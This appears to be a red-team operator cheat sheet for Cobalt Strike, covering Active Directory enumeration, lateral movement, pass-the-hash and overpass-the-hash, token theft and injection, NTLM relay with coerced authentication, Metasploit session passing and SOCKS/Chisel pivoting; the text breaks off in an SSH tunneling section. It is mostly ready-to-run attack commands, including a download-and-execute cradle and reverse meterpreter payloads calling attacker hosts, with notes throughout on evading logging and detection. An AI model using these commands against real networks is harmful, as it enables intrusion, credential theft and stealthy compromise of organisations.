Domain Reconnaissance & Lateral Movement#
Domain Reconnaissance#
PowerView Enumeration#
Usage: Comprehensive Active Directory enumeration using PowerView.
# Import PowerView (use latest SharpView when possible for better OPSEC)
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
# Alternative: Use SharpView for .NET execution (bypasses PowerShell logging)
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-Domain
# ===== DOMAIN ENUMERATION =====
# Get current domain information
beacon> powerpick Get-Domain
beacon> powerpick Get-Domain -Domain corp.local
# Get domain SID
beacon> powerpick Get-DomainSID
# Get domain controllers
beacon> powerpick Get-DomainController | select Forest,Name,OSVersion,IPAddress | fl
# Get forest information
beacon> powerpick Get-ForestDomain
beacon> powerpick Get-ForestDomain -Forest corp.local
# Get domain functional level
beacon> powerpick Get-DomainPolicyData | select -expand SystemAccess
# Get domain password policy
beacon> powerpick Get-DomainPolicyData | select -expand KerberosPolicy
beacon> powerpick (Get-DomainPolicy)."SystemAccess"
# ===== USER ENUMERATION =====
# Get all domain users
beacon> powerpick Get-DomainUser | select samaccountname,description | ft -AutoSize
# Get specific user details
beacon> powerpick Get-DomainUser -Identity jdoe -Properties DisplayName,MemberOf,ServicePrincipalName,LastLogon | fl
# Find users with SPNs (Kerberoastable)
beacon> powerpick Get-DomainUser -SPN | select samaccountname,serviceprincipalname | fl
# Find users without Kerberos pre-authentication (ASREPRoastable)
beacon> powerpick Get-DomainUser -PreauthNotRequired | select samaccountname,distinguishedname | fl
# Find users trusted for delegation
beacon> powerpick Get-DomainUser -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | fl
# Find users with constrained delegation
beacon> powerpick Get-DomainUser | ? {$_.msds-allowedtodelegateto} | select samaccountname,msds-allowedtodelegateto
# Find admin count users (protected by AdminSDHolder)
beacon> powerpick Get-DomainUser -AdminCount | select samaccountname,admincount | ft -AutoSize
# Find users with passwords not required
beacon> powerpick Get-DomainUser -PasswordNotRequired | select samaccountname
# Find users with password never expires
beacon> powerpick Get-DomainUser -PasswordNeverExpires | select samaccountname
# Find users with reversible encryption
beacon> powerpick Get-DomainUser -AllowDelegation | select samaccountname
# ===== COMPUTER ENUMERATION =====
# Get all domain computers
beacon> powerpick Get-DomainComputer | select dnshostname,operatingsystem | ft -AutoSize
# Get computers sorted by OS
beacon> powerpick Get-DomainComputer -Properties DnsHostName,OperatingSystem | sort OperatingSystem | ft -AutoSize
# Find computers with unconstrained delegation
beacon> powerpick Get-DomainComputer -Unconstrained | select dnshostname,samaccountname | ft -AutoSize
# Find computers with constrained delegation
beacon> powerpick Get-DomainComputer -TrustedToAuth | select dnshostname,msds-allowedtodelegateto | fl
# Get domain controllers
beacon> powerpick Get-DomainComputer -Properties DnsHostName,OperatingSystem | ? {$_.OperatingSystem -like "*Server*" -and $_.DnsHostName -like "*DC*"}
# Find computers by operating system
beacon> powerpick Get-DomainComputer -OperatingSystem "*Server 2019*" | select dnshostname
# ===== GROUP ENUMERATION =====
# Get all domain groups
beacon> powerpick Get-DomainGroup | select samaccountname,description | ft -AutoSize
# Find admin groups
beacon> powerpick Get-DomainGroup | ? {$_.Name -like "*Admin*"} | select samaccountname,member | fl
# Get specific group members
beacon> powerpick Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName
# Get group members recursively (includes nested groups)
beacon> powerpick Get-DomainGroupMember -Identity "Domain Admins" -Recurse | select MemberDistinguishedName
# Get user's group memberships
beacon> powerpick Get-DomainGroup -UserName jdoe | select samaccountname
# Find local admin groups
beacon> powerpick Get-DomainGroupMember -Identity "Administrators" | select MemberDistinguishedName
# ===== ORGANIZATIONAL UNIT (OU) ENUMERATION =====
# Get all OUs
beacon> powerpick Get-DomainOU | select name,distinguishedname | ft -AutoSize
# Get computers in specific OU
beacon> powerpick Get-DomainComputer -SearchBase "OU=Workstations,DC=corp,DC=local" | select dnshostname
# Get OUs with specific GPO linked
beacon> powerpick Get-DomainOU -GPLink "{AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F}" | select distinguishedname
# ===== GROUP POLICY ENUMERATION =====
# Get all GPOs
beacon> powerpick Get-DomainGPO | select displayname,gpcfilesyspath | ft -AutoSize
# Get GPOs sorted by name
beacon> powerpick Get-DomainGPO -Properties DisplayName | sort DisplayName
# Find GPO by name
beacon> powerpick Get-DomainGPO | ? {$_.DisplayName -like "*LAPS*"}
# Get local group mappings from GPOs
beacon> powerpick Get-DomainGPOLocalGroup | select GPODisplayName,GroupName
# Find where specific user/group has admin rights via GPO
beacon> powerpick Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName,GPODisplayName,ContainerName,ComputerName | fl
# Get GPO applied to specific computer
beacon> powerpick Get-DomainGPO -ComputerIdentity "WS01" | select displayname
# ===== TRUST ENUMERATION =====
# Get domain trusts
beacon> powerpick Get-DomainTrust
beacon> powerpick Get-DomainTrust -Domain corp.local
# Get forest trusts
beacon> powerpick Get-ForestTrust
beacon> powerpick Get-ForestTrust -Forest corp.local
# Get foreign users in current domain
beacon> powerpick Get-DomainForeignUser | select samaccountname,distinguishedname
# Get foreign group members
beacon> powerpick Get-DomainForeignGroupMember | select GroupDomain,GroupName,MemberName
# ===== ACCESS ENUMERATION =====
# Find computers where current user has local admin
beacon> powerpick Find-LocalAdminAccess
# Check local admin access on specific computer
beacon> powerpick Invoke-CheckLocalAdminAccess -ComputerName dc01.corp.local
# Find where domain admin sessions exist (hunt for admins)
beacon> powerpick Invoke-UserHunter -GroupName "Domain Admins"
# Find where specific user is logged in
beacon> powerpick Invoke-UserHunter -UserName "admin-jdoe"
# Check PSRemoting access
beacon> powerpick Find-PSRemotingLocalAdminAccess -ComputerName srv01.corp.local
# Check WMI access
beacon> powerpick Find-WMILocalAdminAccess -ComputerName srv01.corp.local
# Get sessions on remote computer
beacon> powerpick Get-NetSession -ComputerName dc01.corp.local
# Get logged-on users on remote computer
beacon> powerpick Get-NetLoggedon -ComputerName srv01.corp.local
# ===== ACL ENUMERATION =====
# Find interesting ACLs (GenericAll, WriteDacl, etc.)
beacon> powerpick Get-DomainObjectAcl -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner"}
# Find ACLs for specific user
beacon> powerpick Get-DomainObjectAcl -Identity jdoe -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll|WriteDacl"}
# Find who can modify specific group
beacon> powerpick Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll"}
# Find computers with LAPS passwords readable by current user
beacon> powerpick Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? {$_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty"}
# ===== SHARE ENUMERATION =====
# Find all accessible shares
beacon> powerpick Invoke-ShareFinder
# Find shares on specific computer
beacon> powerpick Invoke-ShareFinder -ComputerName srv01.corp.local
# Find readable shares
beacon> powerpick Find-DomainShare -CheckShareAccess
# Find interesting files on shares
beacon> powerpick Find-InterestingDomainShareFile -Include *.doc*,*.xls*,*.csv,*.ppt*,*.txt
# Search for specific keywords in share files
beacon> powerpick Find-InterestingDomainShareFile -Include *.txt,*.doc* -SearchTerms password,credential,secret
# OPSEC Considerations:
# - PowerView queries generate LDAP traffic (Event ID 4662 on DCs)
# - Use -Server parameter to query specific DC (reduces broadcast queries)
# - Avoid Invoke-UserHunter in production (very noisy, queries all computers)
# - Use SharpView (execute-assembly) to avoid PowerShell logging
# - Space out enumeration commands to avoid detection
Alternative Enumeration Tools#
SharpView (Preferred for OPSEC)#
Usage: .NET implementation of PowerView, bypasses PowerShell logging.
# Basic domain enumeration
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-Domain
# Get domain users
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-DomainUser
# Get domain computers
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-DomainComputer
# Get domain groups
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-DomainGroup
# Get group members
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-DomainGroupMember -Identity "Domain Admins"
# Find local admin access
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Find-LocalAdminAccess
# OPSEC: SharpView generates less telemetry than PowerView
# No PowerShell ScriptBlock logging (Event ID 4104)
ADSearch (Lightweight LDAP Queries)#
Usage: Efficient LDAP search tool for quick AD enumeration.
# Search for all users
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "objectCategory=user"
# Search for admin groups
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=*Admin*))"
# Get specific group members
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=Domain Admins))" --attributes cn,member
# Find Kerberoastable users (SPN set)
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
# Find ASREPRoastable users (pre-auth not required)
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
# Find computers with unconstrained delegation
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
# Find computers with constrained delegation
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json
# Find users with AdminCount=1
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(adminCount=1))" --attributes samaccountname
# Search in specific domain
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "objectCategory=user" --domain corp.local
# Use --json flag for formatted output
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "objectCategory=computer" --attributes dnshostname,operatingsystem --json
# OPSEC: ADSearch is very fast and generates minimal LDAP queries
# Ideal for quick checks without PowerShell
BloodHound Data Collection#
Usage: Collect AD relationships for graph-based attack path analysis.
# SharpHound (latest collector)
beacon> execute-assembly C:\Tools\SharpHound\SharpHound.exe -c All --zipfilename corp_bloodhound.zip
# Collection methods:
# -c All : Collect everything (default)
# -c Session : Collect session data only
# -c LoggedOn : Collect logged-on users
# -c Group : Collect group memberships
# -c LocalAdmin : Collect local admin rights
# -c GPOLocalGroup : Collect GPO-based admin rights
# -c ACL : Collect ACLs
# -c Container : Collect OU structure
# -c ObjectProps : Collect object properties
# -c SPNTargets : Collect SPN targets
# Targeted collection (faster, less noisy)
beacon> execute-assembly C:\Tools\SharpHound\SharpHound.exe -c Session,Group,LocalAdmin --zipfilename corp_targeted.zip
# Stealth collection (no session enumeration)
beacon> execute-assembly C:\Tools\SharpHound\SharpHound.exe -c DCOnly --zipfilename corp_dc_only.zip
# Exclude domain controllers from enumeration
beacon> execute-assembly C:\Tools\SharpHound\SharpHound.exe -c All --excludedomaincontrollers --zipfilename corp_no_dc.zip
# Collect from specific domain
beacon> execute-assembly C:\Tools\SharpHound\SharpHound.exe -d corp.local -c All
# Download collection
beacon> download C:\Users\jdoe\Desktop\corp_bloodhound.zip
# Alternative: AzureHound for Azure AD/Entra ID
beacon> execute-assembly C:\Tools\AzureHound\AzureHound.exe -r All
# OPSEC Considerations:
# - SharpHound creates network traffic to ALL domain computers
# - Session collection (Get-NetSession) is very noisy
# - DCOnly method queries only DC (stealthiest)
# - Avoid running during business hours on monitored networks
# - BloodHound data expires quickly (sessions change)
StandIn (Situational Awareness)#
Usage: Lightweight AD enumeration and manipulation tool.
# Get domain information
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --object domain
# Get forest information
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --object forest
# Enumerate users
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --object user
# Enumerate computers
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --object computer
# Enumerate groups
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --object group
# Get group members
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --group "Domain Admins"
# ASREP Roast
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --asrep
# Kerberoast
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --kerberoast
Lateral Movement#
Jump Methods (Built-in Cobalt Strike)#
Usage: Move laterally using various execution methods.
# ===== SMB-BASED METHODS =====
# PSExec (traditional, requires SMB + Admin$)
beacon> jump psexec64 srv01.corp.local smb_listener
# PSExec with PowerShell (alternative)
beacon> jump psexec_psh srv01.corp.local http_listener
# OPSEC: PSExec creates service and writes to ADMIN$ share
# Generates: Event ID 5145 (share access), 7045 (service creation)
# ===== WINRM-BASED METHODS =====
# WinRM (requires WinRM enabled, port 5985/5986)
beacon> jump winrm64 srv01.corp.local http_listener
# OPSEC: WinRM is common in modern environments
# Generates: Event ID 4624 (logon), 4688 (process creation)
# ===== WMI-BASED METHODS =====
# WMI (stealthier, no service creation)
beacon> remote-exec wmi srv01.corp.local "C:\Windows\beacon.exe"
# OPSEC: WMI is native and common for admin tasks
# Generates: Event ID 4688 (wmiprvse.exe spawns child process)
# ===== AVAILABLE LISTENERS =====
# Before using jump, ensure appropriate listener exists:
# - SMB listener: For peer-to-peer communication over named pipes
# - TCP listener: For direct TCP connections
# - HTTP/HTTPS listener: For standard callback to team server
# CRITICAL: Always use stageless payloads for jump commands
# Staging over network is noisy and unreliable
Remote Execution Methods#
Usage: Execute commands/payloads on remote systems without creating beacon.
# PSExec remote execution
beacon> remote-exec psexec srv01.corp.local "powershell -NoP -W Hidden -Enc <BASE64>"
# WinRM remote execution
beacon> remote-exec winrm srv01.corp.local "powershell -NoP -W Hidden -Enc <BASE64>"
# WMI remote execution
beacon> remote-exec wmi srv01.corp.local "C:\Windows\System32\cmd.exe /c whoami > C:\Windows\Temp\output.txt"
# OPSEC: Use remote-exec for reconnaissance, jump for persistent access
# remote-exec doesn't create beacon, just executes command
Manual Lateral Movement (Step-by-Step)#
PSExec-style Manual Execution#
Usage: Manual PSExec-style lateral movement for better control.
# 1. Upload payload to target
beacon> cd \\srv01.corp.local\ADMIN$
beacon> upload C:\Payloads\smb_x64.svc.exe
# 2. Create service on target
beacon> shell sc \\srv01.corp.local create BeaconSvc binPath= "C:\Windows\smb_x64.svc.exe" start= auto
beacon> shell sc \\srv01.corp.local start BeaconSvc
# 3. Connect to SMB beacon
beacon> link srv01.corp.local TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
# 4. Cleanup (after establishing connection)
beacon> shell sc \\srv01.corp.local stop BeaconSvc
beacon> shell sc \\srv01.corp.local delete BeaconSvc
beacon> shell del \\srv01.corp.local\ADMIN$\smb_x64.svc.exe
WMI Manual Lateral Movement#
Usage: Step-by-step WMI-based lateral movement.
# 1. Upload payload to target
beacon> cd \\srv01.corp.local\C$\ProgramData
beacon> upload C:\Payloads\smb_x64.exe
beacon> mv smb_x64.exe WindowsUpdate.exe
# 2. Execute via WMI
beacon> remote-exec wmi srv01.corp.local "C:\ProgramData\WindowsUpdate.exe"
# Alternative: PowerShell WMI execution
beacon> powerpick Invoke-WmiMethod -ComputerName srv01.corp.local -Class Win32_Process -Name Create -ArgumentList "C:\ProgramData\WindowsUpdate.exe"
# 3. Connect to SMB beacon (if using SMB payload)
beacon> link srv01.corp.local TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
# 4. Cleanup
beacon> shell del \\srv01.corp.local\C$\ProgramData\WindowsUpdate.exe
Advanced Lateral Movement Techniques#
DCOM Execution (Stealthier)#
Usage: Use DCOM for lateral movement without writing files to disk.
# Import Invoke-DCOM script
beacon> powershell-import C:\Tools\Invoke-DCOM.ps1
# Method 1: MMC20.Application (most reliable)
beacon> powerpick Invoke-DCOM -ComputerName srv01.corp.local -Method MMC20.Application -Command "C:\Windows\smb_x64.exe"
# Method 2: ShellWindows (alternative)
beacon> powerpick Invoke-DCOM -ComputerName srv01.corp.local -Method ShellWindows -Command "C:\Windows\smb_x64.exe"
# Method 3: ShellBrowserWindow
beacon> powerpick Invoke-DCOM -ComputerName srv01.corp.local -Method ShellBrowserWindow -Command "C:\Windows\smb_x64.exe"
# Connect to beacon (if using SMB payload)
beacon> link srv01.corp.local TSVCPIPE-agent_007
# OPSEC: DCOM doesn't create services or write obvious files
# Generates fewer suspicious events than PSExec
# Commonly used by legitimate admin tools
Remote .NET Assembly Execution#
Usage: Execute .NET assemblies remotely without file transfer.
# Execute Seatbelt on remote computer
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe OSInfo -ComputerName=srv01
# Execute Rubeus remotely
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage -ComputerName=srv01
# OPSEC: Assembly loaded in memory, no disk writes
# Requires appropriate network access and privileges
Pass-the-Hash Lateral Movement#
Usage: Move laterally using NTLM hashes.
# Use pth command for pass-the-hash
beacon> pth CORP\jdoe 8846f7eaee8fb117ad06bdd830b7586c
# Verify access after PTH
beacon> shell dir \\srv01.corp.local\C$
# Use with jump command
beacon> jump psexec64 srv01.corp.local smb_listener
# Alternative: Use make_token with fake password (NTLM used automatically)
beacon> make_token CORP\jdoe FakePassword123
beacon> shell dir \\srv01.corp.local\C$
# Revert to original token
beacon> rev2self
# OPSEC: NTLM authentication still common in enterprises
# Less suspicious than unusual authentication methods
Overpass-the-Hash (Pass-the-Key)#
Usage: Request TGT using NTLM/AES hash, then use Kerberos for lateral movement.
# Request TGT using NTLM hash
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jdoe /rc4:8846f7eaee8fb117ad06bdd830b7586c /domain:corp.local /nowrap
# Better OPSEC: Use AES256 key
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jdoe /aes256:<aes256_key> /domain:corp.local /opsec /nowrap
# Create sacrificial process and inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:corp.local /username:jdoe /password:FakePass /ticket:<base64_ticket>
# Steal token from sacrificial process
beacon> steal_token <pid>
# Now use jump with Kerberos ticket
beacon> jump psexec64 srv01.corp.local smb_listener
# Cleanup
beacon> rev2self
Token Impersonation & Process Injection#
Usage: Steal tokens or inject into processes for lateral movement.
# List processes with tokens
beacon> ps
# Steal token from specific process (e.g., user logged on remotely)
beacon> steal_token 4464
# Verify impersonation
beacon> getuid
# Use stolen token for access
beacon> shell dir \\srv01.corp.local\C$
# Inject beacon into remote process
beacon> inject 4464 x64 tcp-local
# Return to original token
beacon> rev2self
# Shellcode injection into process
beacon> shinject <pid> x64 C:\Payloads\shellcode.bin
# OPSEC: Token theft requires SeDebugPrivilege
# Injecting into SYSTEM process elevates privileges
RDP Hijacking (Session Hijacking)#
Usage: Hijack existing RDP sessions for lateral movement.
# List RDP sessions
beacon> shell query user
# Hijack session (requires SYSTEM privileges)
beacon> shell tscon <session_id> /dest:<current_session>
# Alternative: Use Mimikatz for RDP session hijacking
beacon> mimikatz !ts::sessions
beacon> mimikatz !ts::remote /id:<session_id>
# OPSEC: Session hijacking is very stealthy
# No new logon event generated (user already logged in)
# Requires SYSTEM privileges on target
PowerShell Remoting (PSRemoting)#
Usage: Use PowerShell remoting for lateral movement.
# Test if PSRemoting is enabled
beacon> powerpick Test-WSMan -ComputerName srv01.corp.local
# Enter remote session
beacon> powerpick Enter-PSSession -ComputerName srv01.corp.local
# Execute command on remote system
beacon> powerpick Invoke-Command -ComputerName srv01.corp.local -ScriptBlock {whoami}
# Execute script on remote system
beacon> powerpick Invoke-Command -ComputerName srv01.corp.local -FilePath C:\Scripts\payload.ps1
# Execute on multiple computers
beacon> powerpick Invoke-Command -ComputerName srv01,srv02,srv03 -ScriptBlock {hostname}
# Download and execute cradle
beacon> powerpick Invoke-Command -ComputerName srv01.corp.local -ScriptBlock {IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.100/payload.ps1')}
# OPSEC: PSRemoting is widely used and expected
# Generates Event ID 4624 (logon type 3) and WinRM event logs
# Default authentication is Kerberos (better than NTLM)
SMB Relay for Lateral Movement#
Usage: Relay NTLM authentication for lateral movement.
# Setup SOCKS proxy on beacon (for ntlmrelayx)
beacon> socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging
# Configure proxychains on attack machine
$ sudo vim /etc/proxychains.conf
socks5 127.0.0.1 1080 socks_user socks_password
# Setup ntlmrelayx through SOCKS
$ sudo proxychains ntlmrelayx.py -t smb://srv01.corp.local -smb2support --no-http-server --no-wcf-server -c 'powershell -NoP -W Hidden -Enc <BASE64>'
# Setup reverse port forward for SMB
beacon> rportfwd 8445 127.0.0.1 445
# Setup PortBender (WinDivert driver for port redirection)
beacon> cd C:\Windows\system32\drivers
beacon> upload C:\Tools\PortBender\WinDivert64.sys
beacon> PortBender redirect 445 8445
# Force authentication (coerce computer to authenticate to us)
# Method 1: PrinterBug
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe srv01.corp.local <our_IP>
# Method 2: PetitPotam
beacon> execute-assembly C:\Tools\PetitPotam\PetitPotam.exe -d corp.local -u jdoe -p password <our_IP> srv01.corp.local
# Connect to relayed session
beacon> link srv01.corp.local TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
# Cleanup
beacon> rportfwd stop 8445
beacon> jobs
beacon> jobkill <portbender_job_id>
beacon> shell del C:\Windows\system32\drivers\WinDivert64.sys
Session Management#
Beacon to Beacon Communication#
Usage: Create additional beacon sessions and manage multiple beacons.
# Spawn new HTTP beacon from DNS beacon (redundancy)
beacon> spawn x64 http_listener
# Spawn SMB beacon for peer-to-peer communication
beacon> spawn x64 smb_listener
# Link to SMB beacon on same machine
beacon> link localhost TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
# Link to SMB beacon on remote machine
beacon> link srv01.corp.local TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
# Unlink SMB beacon (child becomes orphan)
beacon> unlink srv01.corp.local TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
# Spawn TCP beacon for port-forward scenarios
beacon> spawn x64 tcp_listener
# Connect to TCP beacon (after spawning on remote host)
beacon> connect 10.10.10.50 4444
# OPSEC: SMB beacons reduce egress traffic (useful in monitored networks)
# Parent beacon proxies traffic for child beacons
# If parent dies, SMB children become unreachable
Session Passing to Other Frameworks#
Foreign Listener (Cobalt Strike to Metasploit)#
Usage: Pass session from Cobalt Strike to Metasploit (staged payload - x86 only).
# 1. Setup Metasploit listener on attack machine
$ sudo msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST 10.10.5.50
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > set ExitOnSession false
msf6 exploit(multi/handler) > exploit -j
# 2. Create Foreign Listener in Cobalt Strike
# Cobalt Strike > Listeners > Add
# - Name: msf_http
# - Payload: Foreign HTTP
# - Host: 10.10.5.50
# - Port: 8080
# 3. Use jump command with foreign listener
beacon> jump psexec64 srv01.corp.local msf_http
# Alternative: spawn into foreign listener
beacon> spawn x86 msf_http
# OPSEC: Staged payloads are less reliable and more detectable
# Only x86 architecture supported for foreign listeners
# Better to use shellcode injection for stageless payloads
Shellcode Injection (Stageless to Metasploit)#
Usage: Inject Metasploit shellcode for stageless session passing.
# 1. Setup Metasploit listener (stageless)
$ sudo msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_https
msf6 exploit(multi/handler) > set LHOST 10.10.5.50
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > set HandlerSSLCert /path/to/cert.pem
msf6 exploit(multi/handler) > exploit -j
# 2. Generate stageless shellcode
$ msfvenom -p windows/x64/meterpreter_reverse_https LHOST=10.10.5.50 LPORT=443 -f raw -o /tmp/msf_https_x64.bin
# 3. Upload shellcode to beacon
beacon> upload /tmp/msf_https_x64.bin
# 4. Inject shellcode into new process (spawns new process)
beacon> shspawn x64 C:\Temp\msf_https_x64.bin
# Alternative: Inject into existing process
beacon> shinject <pid> x64 C:\Temp\msf_https_x64.bin
# OPSEC: Stageless payloads are more reliable
# x64 support with stageless
# Creates new process (shspawn) or injects into existing (shinject)
Session Passing to Empire/Covenant#
Usage: Pass session to other post-exploitation frameworks.
# Generate Empire/Covenant launcher
# Copy launcher command/script
# Execute in Cobalt Strike beacon
beacon> powerpick <empire_launcher_code>
# Or execute Covenant grunt
beacon> execute-assembly C:\Payloads\GruntHTTP.exe
# OPSEC: Useful for leveraging framework-specific modules
# Multiple C2 channels increase resilience
# Avoid unless specific framework capability needed
Pivoting & Proxying#
SOCKS Proxy Configuration#
Usage: Establish SOCKS proxy through compromised host for pivoting.
# Start SOCKS5 proxy on Cobalt Strike (recommended)
beacon> socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging
# Alternative: SOCKS4 (if compatibility needed)
beacon> socks 1080 socks4
# Start SOCKS4a proxy
beacon> socks 1080 socks4a
# Stop SOCKS proxy
beacon> socks stop
# List active SOCKS proxies
# View > Proxy Pivots
# Verify proxy on team server
$ sudo ss -tulpn | grep 1080
$ sudo netstat -tulpn | grep 1080
# Configure proxychains on attack machine
$ sudo vim /etc/proxychains4.conf
# Add to end of file:
[ProxyList]
socks5 127.0.0.1 1080 socks_user socks_password
# Alternative: Dynamic chain for multiple proxies
dynamic_chain
[ProxyList]
socks5 127.0.0.1 1080 socks_user socks_password
socks5 127.0.0.1 1081 socks_user2 socks_password2
# Use proxychains with tools
$ proxychains nmap -n -Pn -sT -p445,3389,5985 10.10.20.10
$ proxychains crackmapexec smb 10.10.20.0/24
$ proxychains impacket-wmiexec CORP/jdoe@10.10.20.10
$ proxychains impacket-psexec CORP/jdoe@10.10.20.10
# Use with web browsers (FoxyProxy extension)
# SOCKS5 Host: 127.0.0.1
# Port: 1080
# Username: socks_user
# Password: socks_password
# OPSEC Considerations:
# - SOCKS traffic is encrypted between teamserver and beacon
# - Use authentication to prevent unauthorized access
# - Monitor bandwidth usage (SOCKS can be slow over high-latency beacons)
# - Enable logging to track proxy usage
Reverse Port Forwarding#
Usage: Forward traffic from remote host back to team server (inbound to target network).
# Setup reverse port forward (remote port -> local port)
beacon> rportfwd 8080 127.0.0.1 80
# Example: Forward port 8080 on target to port 80 on teamserver
# Target:8080 -> Beacon -> TeamServer:80
# Verify port is listening on target
beacon> shell netstat -ano | findstr 8080
# Create firewall rule on target (if needed)
beacon> powerpick New-NetFirewallRule -DisplayName "WebUpdate" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort 8080
# Test from target network
beacon> powerpick Invoke-WebRequest -Uri http://localhost:8080/payload.ps1
# Access from other hosts in target network
# http://compromised_host:8080/
# Stop reverse port forward
beacon> rportfwd stop 8080
# List active port forwards
beacon> rportfwd
# Remove firewall rule
beacon> powerpick Remove-NetFirewallRule -DisplayName "WebUpdate"
# OPSEC: Reverse port forwards expose team server resources
# Use for payload delivery or C2 redirection
# Clean up firewall rules after operations
Port-to-Port Forwarding (Local)#
Usage: Forward local ports on beacon to remote services.
# Forward local port on beacon to remote service
# Syntax: rportfwd_local <local_port> <forward_to_host> <forward_to_port>
# Example: Access internal RDP through beacon
beacon> rportfwd_local 3389 10.10.20.50 3389
# Now connect from teamserver
$ xfreerdp /v:127.0.0.1:3389 /u:admin /p:password
# Access internal web application
beacon> rportfwd_local 8080 10.10.20.100 80
# Browse from attack machine
$ curl http://127.0.0.1:8080
# Stop local port forward
beacon> rportfwd_local stop 8080
# OPSEC: Allows access to internal services without additional tools
# Traffic flows through beacon (encrypted)
Reverse SOCKS with Chisel#
Usage: Alternative pivoting using Chisel for more flexible tunneling.
# 1. Start Chisel server on attack machine
$ ./chisel server -p 8000 --reverse --socks5
# 2. Upload Chisel client to target
beacon> upload C:\Tools\chisel_windows_amd64.exe
beacon> mv chisel_windows_amd64.exe chisel.exe
# 3. Connect Chisel client to server
beacon> shell chisel.exe client http://10.10.5.50:8000 R:socks
# 4. Configure proxychains to use localhost:1080
$ sudo vim /etc/proxychains4.conf
socks5 127.0.0.1 1080
# 5. Use proxychains for pivoting
$ proxychains nmap -sT -Pn 10.10.20.0/24
# OPSEC: Chisel uses WebSocket for tunneling
# Appears as HTTPS traffic (stealthier)
# Supports multiple simultaneous tunnels
SSH Tunneling (If SSH Available)#
Usage: Use SSH for pivoting when credentials are available.
# Dynamic port forwarding (SOCKS proxy)
$ ssh -D 1080 user@compromised_host.corp.local
# Local port forwarding
$ ssh -L 3389:internal_host:3389 user@compromised_host.corp.local
# Remote port forwarding
